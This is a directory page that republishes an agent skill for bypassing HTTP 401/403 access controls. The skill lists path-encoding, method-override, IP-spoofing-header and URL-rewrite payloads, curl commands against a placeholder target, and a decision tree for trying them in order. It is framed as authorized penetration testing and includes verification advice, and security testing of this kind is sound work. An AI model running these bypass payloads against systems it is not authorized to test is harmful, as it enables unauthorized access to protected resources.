Agent skill

401 403 Bypass Techniques

by uphiago in uphiago/recon-skills

A skill your agent uses when protected HTTP routes return 401 or 403.

MITAuto-check passedSecurity

Install 401 403 Bypass Techniques

skills CLI
$ npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install uphiago/recon-skills 401-403-bypass-techniques --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/recon/401-403-bypass .claude/skills/401-403-bypass-techniques && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
401-403-bypass-techniques
GitHub stars
1.3k
Token cost
~3.1k tokens
SKILL.md length
667 words
Files
1
Skills in repo
23
Repo updated
First seen
Licence
MIT

At a glance

A skill your agent uses when protected HTTP routes return 401 or 403.

  • Works in 8 steps: Path Manipulation Bypasses → HTTP Method Bypass → Header-Based Bypass → …
  • Protected HTTP routes return 401
  • SKILL.md covers When to Use, Prerequisites, How to Run and Procedure, plus 3 more sections
  • Calls curl

What it does

401 403 Bypass Techniques is an agent skill from uphiago/recon-skills. Use when protected HTTP routes return 401 or 403.

Its SKILL.md is about 3.1k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts. Compatibility notes: Requires curl; byp4xx is optional.

It sits in Security, covering Cloud networking. The repository describes itself as: Recon & pentest skill pack. CORS, XSS, SQLi, SSRF, RCE, WordPress, MCP, cloud, subdomain takeover, and more. Field-tested. MIT. Full write-up at hiago.sh. The licence is MIT.

When your agent uses it

  • Protected HTTP routes return 401
  • Tasks that involve Cloud networking

Example prompts

  • “/401-403-bypass-techniques”

Requirements

  • Compatibility (from SKILL.md): Requires curl; byp4xx is optional.

Workflow steps

8 steps, taken from the step headings in SKILL.md.

  1. Path Manipulation Bypasses
  2. HTTP Method Bypass
  3. Header-Based Bypass
  4. Protocol Version Bypass
  5. Verb Tampering + Path Combination
  6. Technology-Specific Bypasses
  7. Automated Tools
  8. Decision Tree

What it can do on your machine

Read from SKILL.md and the folder at commit 1260244. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md. Its commands use curl, which can reach the network depending on how they are called.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

  • Compatibility

    Requires curl; byp4xx is optional.

    From compatibility in the SKILL.md frontmatter.

Context cost

401 403 Bypass Techniques loads about 3.1k tokens when it runs. Until then it costs about 19 tokens; SKILL.md has 667 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~19
When it runs · the whole SKILL.md, loaded when a task matches
~3.1k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from uphiago/recon-skills at commit 1260244, republished under its MIT licence (© uphiago). 667 words, ~3,110 tokens.

Download SKILL.mdSave it as .claude/skills/401-403-bypass-techniques/SKILL.md (or your agent's skills folder).
name
401-403-bypass-techniques
description
Use when protected HTTP routes return 401 or 403.
compatibility
Requires curl; byp4xx is optional.
version
1.0.0
revision_date
2026-08-31
license
MIT
platforms
linux
metadata.tags
recon, authorization, http, access-control, path-normalization
metadata.category
recon
metadata.related_skills
hunt-auth-bypass, hunt-http-smuggling, hunt-ssrf, hunt-idor

401/403 Bypass Techniques

A bypass candidate appears when two HTTP-processing layers (CDN, reverse proxy, web server, framework) decide differently about the same request. The useful signal is a change in routing or protected content, not a status code alone.

When to Use

  • A known route returns 401 Unauthorized or 403 Forbidden.
  • A reverse proxy, WAF, API gateway, or CDN sits in front of the application.
  • Frontend and backend normalize paths, methods, or headers differently.
  • IIS, Tomcat, Spring, Apache, Nginx, or WebDAV routing is visible.
  • Equivalent requests return different status, headers, or body, hinting at a routing differential.

Prerequisites

  • An HTTP client that preserves raw paths: curl --path-as-is or Burp Repeater.
  • A denied baseline request plus a marker for the expected protected content.
  • Optional tooling: byp4xx, dirsearch, feroxbuster, Burp Intruder, nghttp, nc.

How to Run

bash
TARGET="https://target.example"
PATH_DENIED="/admin"
OUTDIR="${OUTPUT_DIR:-./output}/401-403"
mkdir -p "$OUTDIR"

# Denied baseline: record status, headers, and body for comparison.
curl -sS --path-as-is --max-time 10 \
  -D "$OUTDIR/baseline.headers" -o "$OUTDIR/baseline.body" \
  -w 'status=%{http_code} bytes=%{size_download} redirect=%{redirect_url}\n' \
  "$TARGET$PATH_DENIED"

# Compare candidates against the baseline.
curl -sS --path-as-is --max-time 10 -i "$TARGET/./${PATH_DENIED#/}"
curl -sS --path-as-is --max-time 10 -i -X OPTIONS "$TARGET$PATH_DENIED"
curl -sS --path-as-is --max-time 10 -i -H 'X-Forwarded-For: 127.0.0.1' "$TARGET$PATH_DENIED"

For each candidate, compare status, Location, body length, title, and a protected-content marker against the baseline.

Procedure

1. Path Manipulation Bypasses

The core idea: the reverse proxy/WAF checks one path format, but the backend normalizes differently. The ✓ marks request forms that commonly reach the backend through a different route; a 200 alone is not proof of access (see Verification).

1.1 Trailing Slash / Missing Slash
/admin      → 403
/admin/     → 200  ✓ (trailing slash)
/admin/.    → 200  ✓ (trailing dot)
1.2 Case Sensitivity
/admin      → 403
/Admin      → 200  ✓
/ADMIN      → 200  ✓
/aDmIn      → 200  ✓

Works when: proxy rule is case-sensitive but backend is case-insensitive (common on Windows/IIS).

1.3 URL Encoding
/admin          → 403
/%61dmin        → 200  ✓ (encode 'a')
/admi%6e        → 200  ✓ (encode 'n')
/%61%64%6d%69%6e → 200  ✓ (full encode)
1.4 Double URL Encoding
/admin              → 403
/%2561dmin          → 200  ✓ (%25 = %, decoded twice: %61 → a)
/admin%252f         → 200  ✓
/admin..%252f       → 200  ✓
1.5 Unicode / UTF-8 Encoding
/admin          → 403
/admi%C0%AE     → 200  ✓ (overlong UTF-8 for '.')
/admi%C0%6E     → 200  ✓ (overlong UTF-8 for 'n')
/%C0%AFadmin    → 200  ✓ (overlong UTF-8 for '/')

Modern UTF-8 decoders reject overlong forms; these target legacy parsers and mixed decoding chains.

1.6 Dot-Segment / Path Traversal
/admin          → 403
/./admin        → 200  ✓
//admin         → 200  ✓
/admin/./       → 200  ✓
/.//admin       → 200  ✓
/admin..;/      → 200  ✓ (Tomcat path parameter)
1.7 Null Byte
/admin          → 403
/admin%00       → 200  ✓
/admin%00.json  → 200  ✓
/%00/admin      → 200  ✓

Relevant to older native modules; modern managed runtimes usually reject embedded NUL bytes.

1.8 Path Parameter Injection
/admin          → 403
/admin;foo=bar  → 200  ✓ (Tomcat/Java treats ; as path param)
/admin;         → 200  ✓
/admin;x        → 200  ✓
1.9 Trailing Special Characters
/admin%20 (space)  /admin%09 (tab)   /admin? (empty query)
/admin.json        /admin.html       /admin/~
1.10 Backslash (Windows/IIS)
/admin\    /admin\..\/    \..\admin
1.11 Combined Path Tricks
///admin///    /./admin/./    /admin/..;/admin (Tomcat)    /%2e/admin
2. HTTP Method Bypass
2.1 Direct Method Change
GET  /admin → 403
POST /admin → 200  ✓
PUT  /admin → 200  ✓
PATCH /admin → 200  ✓
DELETE /admin → 200  ✓
OPTIONS /admin → 200  ✓ (may leak allowed methods)
TRACE /admin → 200  ✓ (may reflect headers — XST)
HEAD /admin → 200  ✓ (bodyless response; does not by itself confirm access to the protected body)
2.2 Method Override Headers

When the proxy blocks by method, but the backend reads override headers:

http
GET /admin HTTP/1.1
X-HTTP-Method-Override: PUT

GET /admin HTTP/1.1
X-Method-Override: POST

GET /admin HTTP/1.1
X-HTTP-Method: DELETE

POST /admin HTTP/1.1
X-HTTP-Method-Override: PATCH
_method=PUT  (in POST body — Rails, Laravel)
2.3 Custom / Invalid Methods
FOOBAR /admin HTTP/1.1     → some ACLs only check GET/POST
GETS /admin HTTP/1.1       → typo-like methods may bypass
CONNECT /admin HTTP/1.1    → proxy may tunnel
PROPFIND /admin HTTP/1.1   → WebDAV method
MOVE /admin HTTP/1.1       → WebDAV method
3. Header-Based Bypass
3.1 URL Rewrite Headers (Reverse Proxy / IIS ARR)

These headers tell the backend the "real" URL, bypassing proxy-level path checks:

http
GET / HTTP/1.1
X-Original-URL: /admin

GET / HTTP/1.1
X-Rewrite-URL: /admin

The proxy sees GET / (allowed), but the backend routes to /admin.

3.2 IP Spoofing Headers (Whitelist Bypass)

Headers to try (each with values 127.0.0.1, 10.0.0.1, 0.0.0.0, ::1):

http
X-Forwarded-For | X-Real-IP | X-Originating-IP | X-Remote-IP
X-Remote-Addr | X-Client-IP | True-Client-IP | Cluster-Client-IP
X-ProxyUser-IP | X-Custom-IP-Authorization | Forwarded: for=127.0.0.1

IP encoding variants: 0177.0.0.1 (octal), 2130706433 (decimal), 0x7f000001 (hex), localhost

3.3 Other Header Tricks
http
Referer: https://target.com/admin     # Referrer check bypass
Origin: https://target.com             # Origin check bypass
Host: localhost                         # Host header manipulation
X-Forwarded-Host: localhost            # Forwarded host
Content-Type: application/json         # Content-type switch
X-Requested-With: XMLHttpRequest       # AJAX flag
4. Protocol Version Bypass
http
# HTTP/1.0 (some ACLs only apply to HTTP/1.1)
GET /admin HTTP/1.0

# HTTP/0.9 (extremely legacy — no headers)
GET /admin

# HTTP/2 pseudo-header tricks
:method: GET
:path: /admin
:authority: target.com
# See the hunt-http-smuggling skill for H2-specific bypasses, including h2c upgrade.
5. Verb Tampering + Path Combination

Combine multiple techniques for higher success rate:

http
POST / HTTP/1.1                          # method override + URL rewrite
X-Original-URL: /admin
X-HTTP-Method-Override: GET

GET /%61dmin HTTP/1.1                    # IP spoof + path encoding
X-Forwarded-For: 127.0.0.1

GET /Admin HTTP/1.0                      # protocol + case + IP spoof
X-Forwarded-For: 127.0.0.1
Show full SKILL.md (285 more words)Show less
6. Technology-Specific Bypasses
ServerKey Tricks
Apache/admin/ (trailing slash), /.admin (dot prefix), /admin%0d (CR)
Nginx/Admin (case), /admin../ (normalization), X-Original-URL: /admin
IIS/ASP.NET/admin;.css (path param+ext), /admin\ (backslash), /admin::$DATA (ADS), /admin%20
Tomcat/Java/admin;foo (path param), /admin..;/ (traversal), /;/admin (empty param)
Spring/admin.anything (suffix matching, older), /admin/ (trailing slash)
7. Automated Tools
ToolPurposeURL
byp4xxComprehensive 403 bypass scannergithub.com/lobuhi/byp4xx
dirsearchDirectory brute-force with encoding variantsgithub.com/maurosoria/dirsearch
feroxbusterRecursive content discoverygithub.com/epi052/feroxbuster
Burp IntruderCustom payload lists for manual testingportswigger.net
byp4xx usage
bash
# Basic usage: attempts path, method, header, and protocol variants.
byp4xx -m 10 --rate 5 -xD "https://target.com/admin"

# Output shows all attempted bypasses and their response codes.
# Treat 200/301/302 rows as candidates; confirm each against the baseline.
8. Decision Tree
Got 401 or 403 on a path?
│
├── Try PATH MANIPULATION first (highest success rate)
│   ├── /path/      (trailing slash)
│   ├── /PATH       (case change)
│   ├── /path%20    (trailing space)
│   ├── /./path     (dot segment)
│   ├── //path      (double slash)
│   ├── /path;x     (path parameter — Java/Tomcat)
│   ├── /path..;/   (Tomcat specific)
│   ├── /%2e/path   (encoded dot)
│   ├── /path%00    (null byte)
│   ├── /path%23    (encoded hash)
│   └── Result? → status/body differ from baseline = candidate
│
├── Path tricks failed → Try METHOD BYPASS
│   ├── POST/PUT/PATCH/DELETE/OPTIONS
│   ├── HEAD (bodyless GET — verify body access separately)
│   ├── X-HTTP-Method-Override: PUT
│   └── TRACE (may reflect auth headers — XST)
│
├── Method tricks failed → Try HEADER BYPASS
│   ├── X-Original-URL: /path      (reverse proxy/IIS rewrite)
│   ├── X-Rewrite-URL: /path       (same concept)
│   ├── X-Forwarded-For: 127.0.0.1 (IP whitelist)
│   ├── X-Real-IP: 127.0.0.1
│   ├── True-Client-IP: 127.0.0.1
│   └── Referer: https://target.com/path
│
├── Header tricks failed → Try PROTOCOL BYPASS
│   ├── HTTP/1.0 instead of 1.1
│   ├── HTTP/2 h2c smuggling (hunt-http-smuggling)
│   └── WebSocket upgrade
│
├── Single techniques failed → Try COMBINATIONS
│   ├── Method + Path: POST /PATH/
│   ├── Header + Path: X-Forwarded-For + /path%20
│   ├── All three: POST + X-Original-URL + IP headers
│   └── Protocol + Path: HTTP/1.0 + encoded path
│
├── All bypasses failed → Consider ALTERNATIVE APPROACHES
│   ├── Request smuggling (hunt-http-smuggling) → smuggle past ACL
│   ├── SSRF (hunt-ssrf) → access from server
│   ├── IDOR (hunt-idor) → access data directly
│   └── Auth flaws (hunt-auth-bypass) → login bypass
│
└── Automated scan with byp4xx for completeness

Quick Reference — Key Payloads

http
# Top 10 quick-wins (try these first)
GET /admin/     HTTP/1.1        # trailing slash
GET /Admin      HTTP/1.1        # case change
GET /admin%20   HTTP/1.1        # trailing space
GET /./admin    HTTP/1.1        # dot segment
GET //admin     HTTP/1.1        # double slash
POST /admin     HTTP/1.1        # method change
GET / HTTP/1.1                  # X-Original-URL bypass
X-Original-URL: /admin
GET /admin HTTP/1.1             # IP whitelist bypass
X-Forwarded-For: 127.0.0.1
GET /admin;.css HTTP/1.1        # IIS path param
GET /admin..;/ HTTP/1.1         # Tomcat bypass

Pitfalls

  • A 200 may be a login page, generic error, WAF challenge, SPA shell, or cached public response.
  • A 301/302 may only redirect to authentication; inspect Location and the destination body.
  • HEAD has no body; OPTIONS and TRACE expose method behavior, not the protected content.
  • CDN, proxy, server, framework, and application layers may each normalize differently; identify the layer responsible for a change.
  • Browsers and CLI clients normalize URLs differently; use --path-as-is.
  • Some clients and servers collapse // and dot-segments before any check runs, so a candidate can hit the wire as the plain baseline path; confirm the raw request target (Burp Repeater shows what was actually sent).
  • Legacy parser forms only work where a compatible parser exists.
  • Cache hits can make distinct requests look identical or a candidate look successful without reaching the protected handler.

Verification

  • Compare every candidate with the denied baseline: status, reason phrase, Location, WWW-Authenticate, Allow, cache and content-type headers, title, body length, and protected-content markers.
  • Repeat with a cache buster when cache behavior is ambiguous.
  • A bypass is confirmed when the candidate reaches protected content or behavior the baseline cannot reach; a status change alone is an observation, not a bypass.

© uphiago, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in recon/401-403-bypass of uphiago/recon-skills.

Open the folder on GitHubat commit 1260244

Compare with similar skills

401 403 Bypass Techniques next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

401 403 Bypass Techniques compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
401 403 Bypass Techniques this skilluphiago/recon-skills1.3k—~3.1kAutomated safety check: PassMIT
mTLS Configurationwshobson/agents40k9 repos~588Automated safety check: PassMIT
Implementing Next Generation Firewall With Palo Altomukul975/Anthropic-Cybersecurity-Skills34k—~3.1kAutomated safety check: PassApache-2.0
Analyzing Tls Certificate Transparency Logsmukul975/Anthropic-Cybersecurity-Skills34k—~745Automated safety check: PassApache-2.0
Implementing Tlsancoleman/ai-design-components525—~3.6kAutomated safety check: NotesMIT
External Enumerationforefy/.context152—~3.1kAutomated safety check: PassMIT

Similar skills

  • mTLS Configuration

    wshobson/agents

    Walks through mutual TLS between services in a zero-trust setup: certificate hierarchy, rotation, a gradual PERMISSIVE-to-STRICT rollout and handshake debugging.

    40k GitHub starsUsed in 9 repos~588 tokens
    SecurityAuto-check passed
  • Implementing Next Generation Firewall With Palo Alto

    mukul975/Anthropic-Cybersecurity-Skills

    Configures and deploys Palo Alto Networks next-generation firewalls end-to-end, covering App-ID application-aware policies, User-ID identity-based enforcement, zone-based security rules, SSL…

    34k GitHub stars~3.1k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Analyzing Tls Certificate Transparency Logs

    mukul975/Anthropic-Cybersecurity-Skills

    Queries Certificate Transparency logs via crt.sh and pycrtsh to detect phishing domains, unauthorized certificate issuance, and shadow IT.

    34k GitHub stars~745 tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Implementing Tls

    ancoleman/ai-design-components

    Configure TLS certificates and encryption for secure communications.

    525 GitHub stars~3.6k tokensUpdated 10 mo ago
    SecurityAuto-check: notes
  • External Enumeration

    forefy/.context

    Passively map a company's domains, subdomains, DNS ownership, tech stack, and CDNs.

    152 GitHub stars~3.1k tokensUpdated 5 days ago
    SecurityAuto-check passed
  • Performing Adversary In The Middle Phishing Detection

    mukul975/Anthropic-Cybersecurity-Skills

    Detect and respond to Adversary-in-the-Middle (AiTM) phishing attacks that use reverse proxy kits like EvilProxy, Evilginx, and Tycoon 2FA to bypass MFA and steal session tokens, correlating Azure…

    34k GitHub stars~1.7k tokensUpdated 1 mo ago
    SecurityAuto-check passed

More from uphiago/recon-skills

All 23 skills in this repo
  • Flags API endpoints whose data or actions look like they should need a login but currently don't, as part of authorized security testing.

    1.3k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed
  • Error Log Mining

    uphiago/recon-skills

    Mine errorlog for creds, paths, SQL when leak hunt finds. An agent skill from uphiago/recon-skills.

    1.3k GitHub stars~3.3k tokensUpdated 1 mo ago
    Auto-check passed
  • JS Secrets Extraction

    uphiago/recon-skills

    Analyze JS bundles and source maps for hardcoded secrets, API keys, JWTs, and internal endpoints

    1.3k GitHub stars~2.6k tokensUpdated 1 mo ago
    Auto-check passed
  • Recon Playbook

    uphiago/recon-skills

    A skill your agent uses when starting or restructuring an authorized external web and API assessment.

    1.3k GitHub stars~1.9k tokensUpdated 1 mo ago
    Auto-check passed
  • Web Enumeration

    uphiago/recon-skills

    Sensitive file scanning, path traversal bypass, vHost enum, .env extract, log mining, Varnish detect

    1.3k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check: notes
  • Asn Infrastructure Mapping

    uphiago/recon-skills

    Map organization IP infrastructure via ASN, CIDR, TLD expansion, and reverse DNS.

    1.3k GitHub stars~1.6k tokensUpdated 1 mo ago
    Auto-check passed

Questions about 401 403 Bypass Techniques

What does 401 403 Bypass Techniques do?

A skill your agent uses when protected HTTP routes return 401 or 403. 401 403 Bypass Techniques is an agent skill from uphiago/recon-skills. Use when protected HTTP routes return 401 or 403.

When should I use 401 403 Bypass Techniques?

401 403 Bypass Techniques fits situations like: protected HTTP routes return 401; tasks that involve Cloud networking.

How do I install 401 403 Bypass Techniques in Claude Code?

Run `npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a claude-code`. Or copy the skill folder (recon/401-403-bypass in uphiago/recon-skills) into .claude/skills/401-403-bypass-techniques in your project. Claude Code loads it when a task matches its description.

How do I install 401 403 Bypass Techniques in Codex?

Run `npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a codex`. Or copy the skill folder (recon/401-403-bypass in uphiago/recon-skills) into .agents/skills/401-403-bypass-techniques in your project. Codex loads it when a task matches its description.

Can I use 401 403 Bypass Techniques in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/401-403-bypass-techniques, .gemini/skills/401-403-bypass-techniques, .github/skills/401-403-bypass-techniques and .opencode/skills/401-403-bypass-techniques in your project.

What does 401 403 Bypass Techniques need to run?

Going by SKILL.md and its folder, 401 403 Bypass Techniques needs the command-line tools its instructions call (curl). Compatibility (from SKILL.md): Requires curl; byp4xx is optional..

Does 401 403 Bypass Techniques access the network?

SKILL.md contains no URLs. Its commands use curl, which can reach the network depending on how they are called. This is read from the text; nothing was executed.

Is 401 403 Bypass Techniques safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does 401 403 Bypass Techniques use?

401 403 Bypass Techniques is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does 401 403 Bypass Techniques use?

About 3.1k tokens (SKILL.md is roughly 12k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to 401 403 Bypass Techniques?

Skills that share tags, products or a category with 401 403 Bypass Techniques: mTLS Configuration (wshobson/agents, 40k stars), Implementing Next Generation Firewall With Palo Alto (mukul975/Anthropic-Cybersecurity-Skills, 34k stars), Analyzing Tls Certificate Transparency Logs (mukul975/Anthropic-Cybersecurity-Skills, 34k stars) and Implementing Tls (ancoleman/ai-design-components, 525 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains 401 403 Bypass Techniques?

uphiago (a GitHub user) maintains it in uphiago/recon-skills, which has 1,293 GitHub stars. The repository holds 23 skills in this directory. The repository was last updated on September 1, 2026.

Source: uphiago/recon-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.